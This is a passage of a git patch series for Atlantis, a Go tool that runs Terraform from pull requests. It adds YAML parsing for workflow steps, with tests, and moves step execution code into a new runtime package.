map[string]yaml.Workflow{ @@ -634,7 +634,7 @@ workflows: steps: - run: echo apply "arg 2" `, - expOutput: yaml.RepoConfig{ + expOutput: yaml.Config{ Version: 2, Projects: basicProjects, Workflows: map[string]yaml.Workflow{ diff --git a/server/events/yaml/stage.go b/server/events/yaml/stage.go new file mode 100644 index 0000000000..7c84323b55 --- /dev/null +++ b/server/events/yaml/stage.go @@ -0,0 +1,5 @@ +package yaml + +type Stage struct { + Steps []StepConfig `yaml:"steps"` // can either be a built in step like 'plan' or a custom step like 'run: echo hi' +} diff --git a/server/events/yaml/step_config.go b/server/events/yaml/step_config.go new file mode 100644 index 0000000000..f6e7713c0f --- /dev/null +++ b/server/events/yaml/step_config.go @@ -0,0 +1,82 @@ +package yaml + +import ( + "fmt" + + "github.com/flynn-archive/go-shlex" + "github.com/pkg/errors" +) + +type StepConfig struct { + StepType string + ExtraArgs []string + // Run will be set if the StepType is "run". This is for custom commands. + // Ex. if the key is `run: echo hi` then Run will be "echo hi". + Run []string +} + +func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error { + // First try to unmarshal as a single string, ex. + // steps: + // - init + // - plan + var singleString string + err := unmarshal(&singleString) + if err == nil { + if singleString != "init" && singleString != "plan" && singleString != "apply" { + return fmt.Errorf("unsupported step type: %q", singleString) + } + s.StepType = singleString + return nil + } + + // This represents a step with extra_args, ex: + // init: + // extra_args: [a, b] + var step map[string]map[string][]string + if err = unmarshal(&step); err == nil { + if len(step) != 1 { + return errors.New("each step can have only one map key, you probably have something like:\nsteps:\n - key1: val\n key2: val") + } + + for k, v := range step { + if k != "init" && k != "plan" && k != "apply" { + return fmt.Errorf("unsupported step %q", k) + } + + extraArgs, ok := v["extra_args"] + if !ok { + return errors.New("the only supported key for a step is 'extra_args'") + } + + s.StepType = k + s.ExtraArgs = extraArgs + return nil + } + } + + // Try to unmarshal as a custom run step, ex. + // steps: + // - run: my command + var runStep map[string]string + if err = unmarshal(&runStep); err == nil { + if len(runStep) != 1 { + return errors.New("each step can have only one map key, you probably have something like:\nsteps:\n - key1: val\n key2: val") + } + + for k, v := range runStep { + if k != "run" { + return fmt.Errorf("unsupported step %q", k) + } + + s.StepType = "run" + parts, err := shlex.Split(v) + if err != nil { + return err + } + s.Run = parts + } + } + + return err +} diff --git a/server/events/yaml/step_config_test.go b/server/events/yaml/step_config_test.go new file mode 100644 index 0000000000..c75777ba53 --- /dev/null +++ b/server/events/yaml/step_config_test.go @@ -0,0 +1,159 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . "github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestStepConfig_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.StepConfig + expErr string + }{ + + //Single string. + { + description: "should parse just init", + input: `init`, + exp: yaml.StepConfig{ + StepType: "init", + }, + }, + { + description: "should parse just plan", + input: `plan`, + exp: yaml.StepConfig{ + StepType: "plan", + }, + }, + { + description: "should parse just apply", + input: `apply`, + exp: yaml.StepConfig{ + StepType: "apply", + }, + }, + + // With extra_args. + { + description: "should parse init with extra_args", + input: ` +init: + extra_args: [arg1, arg2]`, + exp: yaml.StepConfig{ + StepType: "init", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + { + description: "should parse plan with extra_args", + input: ` +plan: + extra_args: [arg1, arg2]`, + exp: yaml.StepConfig{ + StepType: "plan", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + { + description: "should parse apply with extra_args", + input: ` +apply: + extra_args: [arg1, arg2]`, + exp: yaml.StepConfig{ + StepType: "apply", + ExtraArgs: []string{"arg1", "arg2"}, + }, + }, + + // extra_args with non-strings. + { + description: "should convert non-string extra_args into strings", + input: ` +init: + extra_args: [1]`, + exp: yaml.StepConfig{ + StepType: "init", + ExtraArgs: []string{"1"}, + }, + }, + { + description: "should convert non-string extra_args into strings", + input: ` +plan: + extra_args: [true]`, + exp: yaml.StepConfig{ + StepType: "plan", + ExtraArgs: []string{"true"}, + }, + }, + + // Custom run step. + { + description: "should allow for custom run steps", + input: ` +run: echo my command`, + exp: yaml.StepConfig{ + StepType: "run", + Run: []string{"echo", "my", "command"}, + }, + }, + { + description: "should split words correctly in run step", + input: ` +run: echo 'my command'`, + exp: yaml.StepConfig{ + StepType: "run", + Run: []string{"echo", "my command"}, + }, + }, + + // Invalid steps + { + description: "should error when element is a map", + input: ` +key1: val +key2: val`, + expErr: "each step can have only one map key, you probably have something like:\nsteps:\n - key1: val\n key2: val", + }, + { + description: "should error when unrecognized step is used", + input: ` +invalid: val +`, + expErr: "unsupported step \"invalid\"", + }, + { + description: "should error when unrecognized step is used", + input: ` +invalid: + extra_args: [] +`, + expErr: "unsupported step \"invalid\"", + }, + { + description: "should error when unrecognized step is used", + input: ` +run: []`, + expErr: "yaml: unmarshal errors:\n line 2: cannot unmarshal !!seq into string", + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var got yaml.StepConfig + err := yamlv2.Unmarshal([]byte(c.input), &got) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, got) + }) + } +} diff --git a/server/events/yaml/workflow.go b/server/events/yaml/workflow.go new file mode 100644 index 0000000000..97055cb3da --- /dev/null +++ b/server/events/yaml/workflow.go @@ -0,0 +1,60 @@ +package yaml + +import "errors" + +type Workflow struct { + Apply *Stage `yaml:"apply"` // defaults to regular apply steps + Plan *Stage `yaml:"plan"` // defaults to regular plan steps +} + +func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error { + // Check if they forgot to set the "steps" key and just started listing + // steps, ex. + // plan: + // - init + // - plan + type MissingSteps struct { + Apply []interface{} + Plan []interface{} + } + var missingSteps MissingSteps + // This will pass if they've just set the key to null, which we don't want + // since in that case we use the defaults to we also check if the len > 0. + if err := unmarshal(&missingSteps); err == nil && (len(missingSteps.Apply) > 0 || len(missingSteps.Plan) > 0) { + return errors.New("missing \"steps\" key") + } + + // Use a type alias so unmarshal doesn't get into an infinite loop. + type alias Workflow + var tmp alias + if err := unmarshal(&tmp); err != nil { + return err + } + *p = Workflow(tmp) + + // If plan or apply keys aren't specified we use the default workflow. + if p.Apply == nil { + p.Apply = &Stage{ + []StepConfig{ + { + StepType: "apply", + }, + }, + } + } + + if p.Plan == nil { + p.Plan = &Stage{ + []StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + } + } + + return nil +} diff --git a/server/events/yaml/workflow_test.go b/server/events/yaml/workflow_test.go new file mode 100644 index 0000000000..dd299799e4 --- /dev/null +++ b/server/events/yaml/workflow_test.go @@ -0,0 +1,123 @@ +package yaml_test + +import ( + "testing" + + "github.com/runatlantis/atlantis/server/events/yaml" + . "github.com/runatlantis/atlantis/testing" + yamlv2 "gopkg.in/yaml.v2" +) + +func TestWorkflow_UnmarshalYAML(t *testing.T) { + cases := []struct { + description string + input string + exp yaml.Workflow + expErr string + }{ + { + description: "should use defaults if set to null", + input: `~`, + exp: yaml.Workflow{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ + { + StepType: "apply", + }, + }, + }, + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + }, + }, + }, + { + description: "should use set values", + input: ` +plan: + steps: + - plan +apply: + steps: [] +`, + exp: yaml.Workflow{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{}, + }, + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ + { + StepType: "plan", + }, + }, + }, + }, + }, + { + description: "should use defaults for apply if only plan set", + input: ` +plan: + steps: []`, + exp: yaml.Workflow{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{ + { + StepType: "apply", + }, + }, + }, + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{}, + }, + }, + }, + { + description: "should use defaults for plan if only apply set", + input: ` +apply: + steps: []`, + exp: yaml.Workflow{ + Apply: &yaml.Stage{ + Steps: []yaml.StepConfig{}, + }, + Plan: &yaml.Stage{ + Steps: []yaml.StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + }, + }, + }, + { + description: "should error if no steps key specified", + input: ` +apply: +- apply`, + expErr: "missing \"steps\" key", + }, + } + + for _, c := range cases { + t.Run(c.description, func(t *testing.T) { + var w yaml.Workflow + err := yamlv2.Unmarshal([]byte(c.input), &w) + if c.expErr != "" { + ErrEquals(t, c.expErr, err) + return + } + Ok(t, err) + Equals(t, c.exp, w) + }) + } +} From d6883e83e4a0aa90113cfe85b6a8452ce8aae94e Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 8 Jun 2018 16:36:04 +0100 Subject: [PATCH 15/69] Move runtime elements to the runtime package --- server/events/apply_executor.go | 4 +- server/events/plan_executor.go | 4 +- server/events/project_locker_test.go | 42 ++-- server/events/{yaml => runtime}/apply_step.go | 2 +- .../{yaml => runtime}/apply_step_test.go | 16 +- .../{yaml => runtime}/execution_planner.go | 23 +- server/events/{yaml => runtime}/init_step.go | 2 +- .../{yaml => runtime}/init_step_test.go | 8 +- server/events/{yaml => runtime}/plan_step.go | 2 +- .../{yaml => runtime}/plan_step_test.go | 28 +-- server/events/{yaml => runtime}/repoconfig.go | 2 +- server/events/{yaml => runtime}/run_step.go | 2 +- server/events/runtime/run_step_test.go | 3 + server/events/runtime/runtime.go | 4 + .../yaml/{reader.go => parser_validator.go} | 31 ++- ...eader_test.go => parser_validator_test.go} | 208 ++---------------- server/events/yaml/project.go | 4 +- server/events/yaml/run_step_test.go | 3 - server/events/yaml/yaml.go | 4 + server/server.go | 5 +- 20 files changed, 120 insertions(+), 277 deletions(-) rename server/events/{yaml => runtime}/apply_step.go (97%) rename server/events/{yaml => runtime}/apply_step_test.go (90%) rename server/events/{yaml => runtime}/execution_planner.go (93%) rename server/events/{yaml => runtime}/init_step.go (98%) rename server/events/{yaml => runtime}/init_step_test.go (92%) rename server/events/{yaml => runtime}/plan_step.go (99%) rename server/events/{yaml => runtime}/plan_step_test.go (96%) rename server/events/{yaml => runtime}/repoconfig.go (99%) rename server/events/{yaml => runtime}/run_step.go (97%) create mode 100644 server/events/runtime/run_step_test.go create mode 100644 server/events/runtime/runtime.go rename server/events/yaml/{reader.go => parser_validator.go} (59%) rename server/events/yaml/{reader_test.go => parser_validator_test.go} (71%) delete mode 100644 server/events/yaml/run_step_test.go create mode 100644 server/events/yaml/yaml.go diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go index 6562d8ab8e..dbacf35a64 100644 --- a/server/events/apply_executor.go +++ b/server/events/apply_executor.go @@ -16,10 +16,10 @@ package events import ( "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/run" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" - "github.com/runatlantis/atlantis/server/events/yaml" ) // ApplyExecutor handles executing terraform apply. @@ -31,7 +31,7 @@ type ApplyExecutor struct { AtlantisWorkspace AtlantisWorkspace ProjectLocker *DefaultProjectLocker Webhooks webhooks.Sender - ExecutionPlanner *yaml.ExecutionPlanner + ExecutionPlanner *runtime.ExecutionPlanner } // Execute executes apply for the ctx. diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go index a620f2cb43..7e92917551 100644 --- a/server/events/plan_executor.go +++ b/server/events/plan_executor.go @@ -19,9 +19,9 @@ import ( "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/run" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" - "github.com/runatlantis/atlantis/server/events/yaml" ) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator @@ -39,7 +39,7 @@ type PlanExecutor struct { Workspace AtlantisWorkspace ProjectFinder ProjectFinder ProjectLocker ProjectLocker - ExecutionPlanner *yaml.ExecutionPlanner + ExecutionPlanner *runtime.ExecutionPlanner LockURLGenerator LockURLGenerator } diff --git a/server/events/project_locker_test.go b/server/events/project_locker_test.go index fd95503487..cd6c80d91a 100644 --- a/server/events/project_locker_test.go +++ b/server/events/project_locker_test.go @@ -55,8 +55,8 @@ package events_test // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ // LockAcquired: true, // }, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) -// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err")) +// When(p.ParserValidator.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err")) // // res := p.Execute(&ctx, "", project) // Equals(t, "err", res.ProjectResult.Error.Error()) @@ -68,8 +68,8 @@ package events_test // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ // LockAcquired: true, // }, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) -// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ +// When(p.ParserValidator.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{ // PreInit: []string{"pre-init"}, // }, nil) // tfVersion, _ := version.NewVersion("0.9.0") @@ -86,8 +86,8 @@ package events_test // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ // LockAcquired: true, // }, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) -// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil) +// When(p.ParserValidator.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, nil) // tfVersion, _ := version.NewVersion("0.9.0") // When(tm.Version()).ThenReturn(tfVersion) // When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err")) @@ -102,8 +102,8 @@ package events_test // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ // LockAcquired: true, // }, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) -// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ +// When(p.ParserValidator.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{ // PreGet: []string{"pre-get"}, // }, nil) // tfVersion, _ := version.NewVersion("0.8") @@ -120,8 +120,8 @@ package events_test // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ // LockAcquired: true, // }, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) -// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil) +// When(p.ParserValidator.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, nil) // tfVersion, _ := version.NewVersion("0.8") // When(tm.Version()).ThenReturn(tfVersion) // When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err")) @@ -136,8 +136,8 @@ package events_test // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{ // LockAcquired: true, // }, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) -// When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{ +// When(p.ParserValidator.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{ // PrePlan: []string{"command"}, // }, nil) // tfVersion, _ := version.NewVersion("0.9") @@ -156,11 +156,11 @@ package events_test // LockAcquired: true, // } // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Exists("")).ThenReturn(true) // config := events.ProjectConfig{ // PreInit: []string{"pre-init"}, // } -// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// When(p.ParserValidator.Read("")).ThenReturn(config, nil) // tfVersion, _ := version.NewVersion("0.9") // When(tm.Version()).ThenReturn(tfVersion) // When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil) @@ -182,11 +182,11 @@ package events_test // LockAcquired: true, // } // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Exists("")).ThenReturn(true) // config := events.ProjectConfig{ // PreGet: []string{"pre-get"}, // } -// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// When(p.ParserValidator.Read("")).ThenReturn(config, nil) // tfVersion, _ := version.NewVersion("0.8") // When(tm.Version()).ThenReturn(tfVersion) // @@ -207,11 +207,11 @@ package events_test // LockAcquired: true, // } // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Exists("")).ThenReturn(true) // config := events.ProjectConfig{ // PrePlan: []string{"command"}, // } -// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// When(p.ParserValidator.Read("")).ThenReturn(config, nil) // tfVersion, _ := version.NewVersion("0.9") // When(tm.Version()).ThenReturn(tfVersion) // @@ -231,11 +231,11 @@ package events_test // LockAcquired: true, // } // When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil) -// When(p.ConfigReader.Exists("")).ThenReturn(true) +// When(p.ParserValidator.Exists("")).ThenReturn(true) // config := events.ProjectConfig{ // PreApply: []string{"command"}, // } -// When(p.ConfigReader.Read("")).ThenReturn(config, nil) +// When(p.ParserValidator.Read("")).ThenReturn(config, nil) // tfVersion, _ := version.NewVersion("0.9") // When(tm.Version()).ThenReturn(tfVersion) // @@ -262,7 +262,7 @@ package events_test // r := rmocks.NewMockRunner() // return &events.DefaultProjectLocker{ // Locker: l, -// ConfigReader: cr, +// ParserValidator: cr, // Terraform: tm, // Run: r, // }, l, tm, r diff --git a/server/events/yaml/apply_step.go b/server/events/runtime/apply_step.go similarity index 97% rename from server/events/yaml/apply_step.go rename to server/events/runtime/apply_step.go index 4b6a360612..3591414815 100644 --- a/server/events/yaml/apply_step.go +++ b/server/events/runtime/apply_step.go @@ -1,4 +1,4 @@ -package yaml +package runtime import ( "fmt" diff --git a/server/events/yaml/apply_step_test.go b/server/events/runtime/apply_step_test.go similarity index 90% rename from server/events/yaml/apply_step_test.go rename to server/events/runtime/apply_step_test.go index f2066140e2..862f5e10e5 100644 --- a/server/events/yaml/apply_step_test.go +++ b/server/events/runtime/apply_step_test.go @@ -1,4 +1,4 @@ -package yaml_test +package runtime_test import ( "io/ioutil" @@ -9,14 +9,14 @@ import ( . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform/mocks" - "github.com/runatlantis/atlantis/server/events/yaml" . "github.com/runatlantis/atlantis/testing" ) func TestRun_NoDir(t *testing.T) { - s := yaml.ApplyStep{ - Meta: yaml.StepMeta{ + s := runtime.ApplyStep{ + Meta: runtime.StepMeta{ Workspace: "workspace", AbsolutePath: "nonexistent/path", DirRelativeToRepoRoot: ".", @@ -33,8 +33,8 @@ func TestRun_NoPlanFile(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() - s := yaml.ApplyStep{ - Meta: yaml.StepMeta{ + s := runtime.ApplyStep{ + Meta: runtime.StepMeta{ Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", @@ -58,8 +58,8 @@ func TestRun_Success(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.11.4") - s := yaml.ApplyStep{ - Meta: yaml.StepMeta{ + s := runtime.ApplyStep{ + Meta: runtime.StepMeta{ Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", diff --git a/server/events/yaml/execution_planner.go b/server/events/runtime/execution_planner.go similarity index 93% rename from server/events/yaml/execution_planner.go rename to server/events/runtime/execution_planner.go index c349034004..012d6b008d 100644 --- a/server/events/yaml/execution_planner.go +++ b/server/events/runtime/execution_planner.go @@ -1,17 +1,23 @@ -package yaml +package runtime import ( "fmt" + "os" "path/filepath" "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" ) +const PlanStageName = "plan" +const ApplyStageName = "apply" +const AtlantisYAMLFilename = "atlantis.yaml" + type ExecutionPlanner struct { TerraformExecutor TerraformExec DefaultTFVersion *version.Version - ConfigReader *Reader + ParserValidator *yaml.ParserValidator } type TerraformExec interface { @@ -30,17 +36,18 @@ func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir str } func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []Step) ([]Step, error) { - config, err := s.ConfigReader.ReadConfig(repoDir) - if err != nil { - return nil, err - } + config, err := s.ParserValidator.ReadConfig(repoDir) // If there's no config file, use defaults. - if config == nil { + if os.IsNotExist(err) { log.Info("no %s file found––continuing with defaults", AtlantisYAMLFilename) return defaults, nil } + if err != nil { + return nil, err + } + // Get this project's configuration. for _, p := range config.Projects { if p.Dir == relProjectPath && p.Workspace == workspace { @@ -61,7 +68,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge // We have a workflow defined, so now we need to build it. meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) var steps []Step - var stepsConfig []StepConfig + var stepsConfig []yaml.StepConfig if stageName == PlanStageName { stepsConfig = workflow.Plan.Steps } else { diff --git a/server/events/yaml/init_step.go b/server/events/runtime/init_step.go similarity index 98% rename from server/events/yaml/init_step.go rename to server/events/runtime/init_step.go index 235b90244e..1bf5b8734d 100644 --- a/server/events/yaml/init_step.go +++ b/server/events/runtime/init_step.go @@ -1,4 +1,4 @@ -package yaml +package runtime // InitStep runs `terraform init`. type InitStep struct { diff --git a/server/events/yaml/init_step_test.go b/server/events/runtime/init_step_test.go similarity index 92% rename from server/events/yaml/init_step_test.go rename to server/events/runtime/init_step_test.go index bfdbd84b5f..911bcb2330 100644 --- a/server/events/yaml/init_step_test.go +++ b/server/events/runtime/init_step_test.go @@ -1,4 +1,4 @@ -package yaml_test +package runtime_test import ( "testing" @@ -7,8 +7,8 @@ import ( . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform/mocks" - "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" . "github.com/runatlantis/atlantis/testing" ) @@ -43,8 +43,8 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { tfVersion, _ := version.NewVersion(c.version) logger := logging.NewNoopLogger() - s := yaml.InitStep{ - Meta: yaml.StepMeta{ + s := runtime.InitStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", diff --git a/server/events/yaml/plan_step.go b/server/events/runtime/plan_step.go similarity index 99% rename from server/events/yaml/plan_step.go rename to server/events/runtime/plan_step.go index 99890e62ea..b8d6b3acee 100644 --- a/server/events/yaml/plan_step.go +++ b/server/events/runtime/plan_step.go @@ -1,4 +1,4 @@ -package yaml +package runtime import ( "fmt" diff --git a/server/events/yaml/plan_step_test.go b/server/events/runtime/plan_step_test.go similarity index 96% rename from server/events/yaml/plan_step_test.go rename to server/events/runtime/plan_step_test.go index 91e9372d37..53b45c2e64 100644 --- a/server/events/yaml/plan_step_test.go +++ b/server/events/runtime/plan_step_test.go @@ -1,4 +1,4 @@ -package yaml_test +package runtime_test import ( "errors" @@ -11,8 +11,8 @@ import ( . "github.com/petergtz/pegomock" "github.com/runatlantis/atlantis/server/events/mocks/matchers" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform/mocks" - "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" . "github.com/runatlantis/atlantis/testing" ) @@ -25,8 +25,8 @@ func TestRun_NoWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "default" - s := yaml.PlanStep{ - Meta: yaml.StepMeta{ + s := runtime.PlanStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: workspace, AbsolutePath: "/path", @@ -61,8 +61,8 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "notdefault" - s := yaml.PlanStep{ - Meta: yaml.StepMeta{ + s := runtime.PlanStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: workspace, AbsolutePath: "/path", @@ -112,8 +112,8 @@ func TestRun_SwitchesWorkspace(t *testing.T) { tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := yaml.PlanStep{ - Meta: yaml.StepMeta{ + s := runtime.PlanStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", @@ -170,8 +170,8 @@ func TestRun_CreatesWorkspace(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := yaml.PlanStep{ - Meta: yaml.StepMeta{ + s := runtime.PlanStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", @@ -212,8 +212,8 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := yaml.PlanStep{ - Meta: yaml.StepMeta{ + s := runtime.PlanStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", @@ -258,8 +258,8 @@ func TestRun_AddsEnvVarFile(t *testing.T) { // Using version >= 0.10 here so we don't expect any env commands. tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := yaml.PlanStep{ - Meta: yaml.StepMeta{ + s := runtime.PlanStep{ + Meta: runtime.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: tmpDir, diff --git a/server/events/yaml/repoconfig.go b/server/events/runtime/repoconfig.go similarity index 99% rename from server/events/yaml/repoconfig.go rename to server/events/runtime/repoconfig.go index 7af982436b..138f73f0db 100644 --- a/server/events/yaml/repoconfig.go +++ b/server/events/runtime/repoconfig.go @@ -1,4 +1,4 @@ -package yaml +package runtime import ( "github.com/hashicorp/go-version" diff --git a/server/events/yaml/run_step.go b/server/events/runtime/run_step.go similarity index 97% rename from server/events/yaml/run_step.go rename to server/events/runtime/run_step.go index e4794a22ce..ba6dbe3859 100644 --- a/server/events/yaml/run_step.go +++ b/server/events/runtime/run_step.go @@ -1,4 +1,4 @@ -package yaml +package runtime import ( "fmt" diff --git a/server/events/runtime/run_step_test.go b/server/events/runtime/run_step_test.go new file mode 100644 index 0000000000..899327a695 --- /dev/null +++ b/server/events/runtime/run_step_test.go @@ -0,0 +1,3 @@ +package runtime_test + +// todo diff --git a/server/events/runtime/runtime.go b/server/events/runtime/runtime.go new file mode 100644 index 0000000000..ea70550a68 --- /dev/null +++ b/server/events/runtime/runtime.go @@ -0,0 +1,4 @@ +// Package runtime handles constructing an execution graph for each action +// based on configuration and defaults. The handlers can then execute this +// graph. +package runtime diff --git a/server/events/yaml/reader.go b/server/events/yaml/parser_validator.go similarity index 59% rename from server/events/yaml/reader.go rename to server/events/yaml/parser_validator.go index eaea835393..8612015043 100644 --- a/server/events/yaml/reader.go +++ b/server/events/yaml/parser_validator.go @@ -5,49 +5,46 @@ import ( "io/ioutil" "os" "path/filepath" - "strings" "github.com/pkg/errors" "gopkg.in/yaml.v2" ) +// AtlantisYAMLFilename is the name of the config file for each repo. const AtlantisYAMLFilename = "atlantis.yaml" -const PlanStageName = "plan" -const ApplyStageName = "apply" -type Reader struct{} +type ParserValidator struct{} -// ReadConfig returns the parsed and validated config for repoDir. -// If there was no config, it returns a nil pointer. -func (r *Reader) ReadConfig(repoDir string) (*Config, error) { +// ReadConfig returns the parsed and validated atlantis.yaml config for repoDir. +// If there was no config file, then this can be detected by checking the type +// of error: os.IsNotExist(error). +func (r *ParserValidator) ReadConfig(repoDir string) (Config, error) { configFile := filepath.Join(repoDir, AtlantisYAMLFilename) configData, err := ioutil.ReadFile(configFile) - // If the file doesn't exist return nil. + // NOTE: the error we return here must also be os.IsNotExist since that's + // what our callers use to detect a missing config file. if err != nil && os.IsNotExist(err) { - return nil, nil + return Config{}, err } // If it exists but we couldn't read it return an error. if err != nil { - return nil, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) + return Config{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) } // If the config file exists, parse it. config, err := r.parseAndValidate(configData) if err != nil { - return nil, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) + return Config{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) } - return &config, err + return config, err } -func (r *Reader) parseAndValidate(configData []byte) (Config, error) { +func (r *ParserValidator) 